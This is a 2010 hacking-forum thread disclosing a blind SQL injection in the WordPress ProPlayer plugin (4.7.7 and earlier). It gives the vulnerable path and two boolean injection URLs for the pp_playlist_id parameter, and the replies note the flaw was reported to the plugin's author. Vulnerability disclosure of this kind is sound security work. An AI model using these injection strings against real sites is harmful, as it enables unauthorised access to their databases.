EvilZone

Hacking and Security => Hacking and Security => : ca0s December 11, 2010, 11:09:09 PM

: WP-ProPlayer Plugin Blind SQL Injection
: ca0s December 11, 2010, 11:09:09 PM

<-------

   WP-ProPlayer Blind SQL Inyection

   Founder: Ca0s

   Visit:
      st4ck-3rr0r.blogspot.com
      ka0-labs.org
   Shouts @
      evilzone.org
      elhacker.net
      diosdelared.com

------->
<-------

   Software: ProPlayer <= 4.7.7
   URL:
      http://wordpress.org/extend/plugins/proplayer/ (http://wordpress.org/extend/plugins/proplayer/)
      http://isagoksu.com/proplayer-wordpress-plugin/ (http://isagoksu.com/proplayer-wordpress-plugin/)
   Vuln: Blind SQL Inyection ->
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='a
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='b

   Note: some servers filter ' to %27 so wont work this way.

------->

: Re: WP-ProPlayer Plugin Blind SQL Injection
: ande December 12, 2010, 12:06:11 AM

Vulnerability status? I couldn't find any fix notes on their site.

: Re: WP-ProPlayer Plugin Blind SQL Injection
: ca0s December 12, 2010, 12:58:06 AM

Unfixed.
I reported it to author.

: Re: WP-ProPlayer Plugin Blind SQL Injection
: ande December 12, 2010, 01:04:08 AM

: ca0s  December 12, 2010, 12:58:06 AM

Unfixed.
I reported it to author.

Sweet, better hope they fix it quick :P

: Re: WP-ProPlayer Plugin Blind SQL Injection
: solar February 25, 2011, 07:24:13 PM

Cool... nice find.